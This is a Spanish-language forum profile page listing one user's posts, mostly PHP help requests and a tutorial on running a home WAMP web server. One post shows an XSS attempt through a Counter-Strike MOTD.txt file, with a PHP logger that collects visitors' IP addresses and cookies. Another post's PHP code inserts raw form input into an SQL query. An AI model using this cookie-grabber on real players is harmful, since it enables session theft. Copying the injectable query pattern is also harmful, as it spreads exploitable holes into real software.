elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Temas
Páginas: [1] 2 3 4
1  Media / Diseño Gráfico / Problema con Tono (photoshop) en: 28 Abril 2010, 21:06 pm
Bueno resulta que estaba haciendo un proyecto, y lo que quiero es que el tono de un color (al igual que se cambian los colores de ojo), se cambie de: por ejemplo, violeta a blanco...

Pero no se cambia a blanco sino a gris, alguien tiene alguna idea de porque?


Pd:esta en colores RGB


saludos
2  Seguridad Informática / Nivel Web / La web desde el ojo de un atacante... en: 1 Abril 2010, 19:52 pm
Viendo unos videos de informatica, una conferencia en argentina que se explica un poco en general todo lo que es bugs a nivel web, desde el atacante.


Aviso: es alrgo duro 1 hs 15 min, pero es interesante.

http://www.youtube.com/watch?v=Ck9yzGPRsU8

saludos
3  Seguridad Informática / Abril negro / Abril negro, bienvenido... en: 1 Abril 2010, 07:13 am
Gentee, le damos al abril negro '10 una fuerte bienvenida, por los que no saben lo que es bueno, google.com.


a ver que presentan, que herramientas buenas, y eso si, se pueden hacer cosas que no se pueden como en cualquier mes.


a Lammer earh


saludos
4  Foros Generales / Foro Libre / Y elhackerblog, No murio! en: 9 Enero 2010, 20:38 pm
Aca de nuevo para la gente que me habia dicho, y el blog que paso?.

bueno aca esta, nuevo diseño, andan los comentarios. y ahora si!, todo actualizado.

a los que no entienden o no vieron el post hace unos meses en el blog está explicado.


por favor, comenten a ver que les parece.

http://elhackerblog.blogspot.com/



Saludos!


PD:Entrada: Agradecimientos a kamsky
5  Programación / PHP / A los viejitos en PHP y Mysql :P en: 27 Diciembre 2009, 06:32 am
Bueno, despeus de leer bastantes tutoriales y ya tener alguna base de php y mysql, necesito saber, a los mas experimentados, como seria mejor y rapido, hacer una especie de juego-navegador.

que seria lo mas recomendable para usar, osea obviamente lo hago en php, pero para tener una idea de como seria


saludso!
6  Seguridad Informática / Nivel Web / Counter strike MOTD.txt en: 23 Diciembre 2009, 00:45 am
Bueno gente,el que alguna vez tubo un server de counter strike, sabe que el archivo MOTD.txt contiene ese especie de "portada", al iniciarse en un server.

aca el code del MOTD.txt

Código
  1. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
  2. <title>Cstrike MOTD</title>
  3. <style type="text/css">
  4. pre {
  5. font-family:Verdana,Tahoma;
  6. color:#FFB000;
  7.     }
  8. body {
  9. background:#000000;
  10. margin-left:8px;
  11. margin-top:0px;
  12. }
  13. a {
  14.     text-decoration:    underline;
  15. }
  16. a:link  {
  17.    color:  #FFFFFF;
  18.    }
  19. a:visited   {
  20.    color:  #FFFFFF;
  21.    }
  22. a:active    {
  23.    color:  #FFFFFF;
  24.    }
  25. a:hover {
  26.    color:  #FFFFFF;
  27.    text-decoration:    underline;
  28.    }
  29. </head>
  30. <body scroll="no">
  31. <pre>
  32. You are playing Counter-Strike v1.6
  33. Visit the official CS web site @
  34. www.counter-strike.net
  35. <a href="http://www.counter-strike.net">Visit Counter-Strike.net</a>
  36. </pre>
  37. </body>
  38. </html>

Supongo que sabran que significara todo esto, o lo habran visto alguna vez.

Entonces dije, CARAJO, porque no me di cuenta antes, y buen empeze a "tocar" un poco todo y aqui esta el code con los cambios.

Código
  1. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
  2. <title>caca</title>
  3. <script>alert("scripting")<script>
  4. <META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://localhost/web.php?cookie=">
  5. <style type="text/css">
  6. pre {
  7. font-family:Verdana,Tahoma;
  8. color:#FFB000;
  9.     }
  10. body {
  11. background:#000000;
  12. margin-left:8px;
  13. margin-top:0px;
  14. }
  15. a {
  16.     text-decoration:    underline;
  17. }
  18. a:link  {
  19.    color:  #FFFFFF;
  20.    }
  21. a:visited   {
  22.    color:  #FFFFFF;
  23.    }
  24. a:active    {
  25.    color:  #FFFFFF;
  26.    }
  27. a:hover {
  28.    color:  #FFFFFF;
  29.    text-decoration:    underline;
  30.    }
  31. </head>
  32. <body scroll="no">
  33. <pre>
  34. You are playing Counter-Strike v1.6
  35. Visit the official CS web site @
  36. www.counter-strike.net
  37. <a href="http://www.counter-strike.net">Visit Counter-Strike.com</a>
  38. </pre>
  39. </body>
  40. </html>

le puse que se redireccione, a web.php, para sacar cookies, que todavía no me salio nose porque.

aca web.php:

Código
  1. <html>
  2. <head>
  3. <title>Xss re pillo</html>
  4. </head>
  5. <body>
  6. <?php
  7. $ip = $_SERVER['REMOTE_ADDR'];
  8. $userAgent = $_SERVER['HTTP_USER_AGENT'];
  9. $cookie = $_GET['cookie'];
  10. $scuandal = "ip-víctima:" . $ip . " sistema operativo:" . PHP_OS . " -Servidor :" . $_SERVER['SERVER_NAME'] . " [+] info del server: " . $_SERVER['SERVER_SOFTWARE'] . $cookie;
  11. $fff = fopen("archivo.txt","a");
  12. fwrite($fff, "$scuandal \n");
  13. fclose($fff);
  14. ?>
  15. <script>window.location='http://localhost/web.php?cookie='+document.cookie;</script>
  16. </body>
  17. </html>

y  :o, observen archivo.txt

ip-víctima:127.0.0.1 sistema operativo:WINNT -Servidor :localhost
  • info del server: Apache/2.2.11 (Win32) PHP/5.3.0

lo probe con un amigo y me da su info

obvio que info del server va a ser mi info jajja

bien se peude sacar info por php, pero ahora la gran pregunta, si tantos navegadores poseen bugs, como mozilla,IE, aunque no sea un navegador completo, seria una especie, tendria que tener bugs si son permitidos tambien estos tipos de cosas.

nadie sabe donde se encuentra el "navegador", donde se carga el MOTD.txt

si alguien tiene ganas de buscar, que tenga un poco mas de idea podemos sacar algo de provecho a esto.

PD:Es una mezcla entre bugs y exploits a nivel web-hacking-y bugs y exploits jajaja

saludos
7  Programación / PHP / Simple sistema de administracion de portafolio (incasoft) by fede_cp en: 19 Diciembre 2009, 20:31 pm
Sistema de administracion Incasoft

Gente, como menciono anteriormente castg, hicimos como un sistema de administracion con "fecha de entrega", y bueno se me paso un poquito  ;-),pero por fin pude terminarlo, No pude ordenar el codigo, asique si ven algunas cosas repetidas, no lo digan porque ya se que me falta depurar y demas.

ahora me gustaria que verifiquen, el diesño y ademas la seguridad.

algunas fotos

Instalacion!



Esa es la parte numero dos de la instalacion.

ya logueado !



y ahora el protafolio!



PD: La seguridad esta solo hecha del usuario visitante para abajo, nose si me entienden, osea dentro del sistema de adminsitracion ya logueado , si hay problema de seguridad, si alguien tiene ganas de arreglarlo joya, pero ya el bocho no me daba mas.

tambien nose si se dieron cuenta, pero portafolio.php esta dentro de la carpeta de administracion pero bue, no es para USARLO el sistema sino para que lo prueben y vean como es.

por favor traten de bajarlo e instalarlo que costo mucho laburo, encima la instalacion es una boludes, ademas de que es muy rapida.

aca todos los codes:

Codigo del sistema!

saludos!


8  Programación / PHP / Problema con str_replace en: 15 Diciembre 2009, 17:57 pm
bueno estoy terminando mi sistema de admin, pero no puedo realizar una funcion en la que se pone la url de la web, y queda almacenada pero esta, no debe tener el "http://"

entonces primero hice un ereg, y en las pruebas funcionaba. pero al pasarlo al sistema no.

entonces puse el str_replace y tampoco osea, queda el link http://http://google.com.

aca el code de lo que digo:

Código
  1. $url = $_POST['url'];
  2. $url = eregi_replace("http://","",$url); /* o $url = str_replace("http://","",$url) (da igual*/
  3. $img_link = $_POST['img-link'];
  4. $desc = $_POST['desc'];
  5. $nombre = $_POST['nombre'];
  6. $palabra = $_POST['palabra'];
  7. $fecha = date("d-m-y");
  8. $cons = "INSERT INTO info_sitios (descripcion,link,sitio,url,palabra_carc,fecha) VALUES ('$desc','$img_link','$url','$nombre','$palabra','$fecha')";
  9. mysql_query($cons, $conexion);

nose cual es mi error

saludos!
9  Programación / PHP / Problema con string de consulta a bbdd en: 9 Diciembre 2009, 03:27 am
buen, resulta que quiero hacer una consulta con WHERE a un id (que es una variable), pero me da parse error, y probe con un monton de cosas, nose porque me lo sigue dando, aver si me dan una mano.

code:

Código
  1. $consulta3 = "SELECT sitio FROM info_sitios WHERE id = '".$tot2[0]."'");


que, buen gente saludos

espero que me puedan ayudar
10  Programación / Desarrollo Web / Creando un servidor web con WAMP en: 2 Diciembre 2009, 02:25 am
Creando nuestra PC en Servidor Web.

Bueno gente en este tutorial, se va a explicar como se podría crear un servidor Web “casero” destinado a Windows, con nuestra propia PC. Para esto es necesario instalar la compilación de MySQL, Apache, y PHP. Este programa se Llama WAMP.

Muchos de por aquí lo de deben conocer porque es muy práctico a la hora realizar pruebas locales.

Antes de seguir leyendo, es necesario leer un poco, de que se trata PHP, MySQL, y Apache, para saber aunque sea que están instalando en su disco duro ¬¬.

Entonces, ¡Manos a la obra! A instalar WAMP, primero que nada descargamos el ejecutable desde la Web oficial: http://www.wampserver.com/en/download.php.

Al terminar de descargar el .exe, ejecutarlo y se van a encontrar con la siguiente imagen:


---Next
 


Aceptan términos y condiciones, y dan a next.



Les preguntan en que directorio quieren instalar WAMP, por mi preferencia en C:/WAMP, y sino se la cambian y dan a next.

 

Les pregunta si quieren un icono en el escritorio, eligen lo que quieren.



Da un resumen de todas sus preferencias, y si esta todo OK, click en install.


Se instala…



Va a salir un cartel para elegir el navegador preferido, eligen obviamente el preferido (mozilla para mi gusto), y dan a abrir.
 


En esta parte dejen todo como esta, o pongan el mail del dominio, igualmente se puede cambiar en un futuro, dan a next.



Listo, la instalación de WAMP está terminada, dan a finish y luego, ejecutan WAMP.



Para comprobar que la instalación de WAMP, ha sido correcta, se dirigen hacia el navegador, y colocan: 127.0.0.1, o localhost…

http://localhost
o
http://127.0.0.1

Tendrían que tener un pantallazo algo así:



Posibles errores:

Probablemente si estas detrás de un router, no funcione en la primera, sino que para que funcione como servidor, en cualquier puerto, en nuestro caso el 80, es necesario redireccionar dicho puerto a la IP local. Para esto es necesario entrar a la configuración del router, entrar en la sección de mapeo (NAT), y agregar el puerto deseado y la IP local de la computadora, luego reiniciar el router.

Si funciona correctamente ir a: Configurando nuestro Server.

Pantallazo:



Si se mantiene el Server como “Server offline” o servidor desactivado, vayan al icono de WAMP, hagan un solo click, luego, despliegan el menú horizontal de “apache”, luego desplieguen “service”, y si el servicio dice “Run/continue service”, como para apretar, hagan click sobre él, si no pasa absolutamente nada, o sigue igual, o da algún tipo de error, prueben con dar en probar puerto 80, si hicieron eso y les da un pantallazo parecido al siguiente continúen.



Esto se da porque el puerto 80 esta siendo usado por otro programa, tal como antivirus, etc.

Si les ha pasado todo esto XD, vayan donde instalaron WAMP, abran la carpeta “bin”, después la carpeta “apache”, luego Apache2.2.11, o la version que tengan,  luego
“conf”, y abran el archivo: httpd.conf.
El directorio donde se contiene ese archivo en mi caso seria:

C:\wamp\bin\apache\Apache2.2.11\conf

Luego en el archivo abierto buscan la siguiente línea: “Listen 80”.

Y lo cambian por “Listen 8080”, de la siguiente manera:



Y luego lo guardan.

Ahora cierran WAMP, lo abren nuevamente, y tendría que decir “Server active” o “servidor activo”.

También si no funciona fíjense que diga Apagar Server, osea, que esté prendido ¬¬.

Para comprobar que funcione, vayan al navegador, y prueben con:

http://localhost:8080

Entonces, debería aparecer algo así como el pantallazo del principio.

PD: No es recomendable para el futuro seguir con esta configuración, lo mejor es utilizar el puerto 80, ya que sino la Web, va a ser: www.webejemplo.com:8080

Configurando Nuestro Server para Internet

Bien, por ahora ya tenemos configurado nuestro Server para usarlo localmente, solo cambiando algunas cosillas en el firewall, lo tendremos andando en Internet.

Lo primero que debemos hacer es ya en esta instancia tener configurado el Server en el puerto 80, en su defecto quedaría como antes nombre.

Lo que deben hacer ahora es deshabilitar del firewall, el puerto utilizado (en mi caso el 80).
Para ello van al panel de control-firewall de Windows-Excepciones-Luego clic en “Agregar puerto”, agregan el puerto deseado, ponen un nombre, y listo.
Si ya han deshabilitado el firewall de Windows y OTROS firewalls, entonces poniendo su IP pública, ejemplo http://190.23.23.23:puerto, si utilizan el 80 no es necesario, obviamente poner el: puerto.

Tendría que aparecer la Web como si fuera en localhost, pídanle a un amigo que pruebe para ver si se ve algo.
Si es así, van por buen camino, y sino pregunten por acá en el foro cual es su situación.

Ya tenemos nuestro Server creado, una buena idea para dirigir a las personas y no tener que ir “rastreando” nuestra IP, es crear un dominio NO-IP, e ingresar desde allí.

No es mi deber explicar como se crea un dominio NO-IP, ya que hay muchos tutoriales por ahí en la red.

Espero que haya servido de utilidad el tutorial.

mas tartde pongo colores y esas cosas.

Saludos!
Páginas: [1] 2 3 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines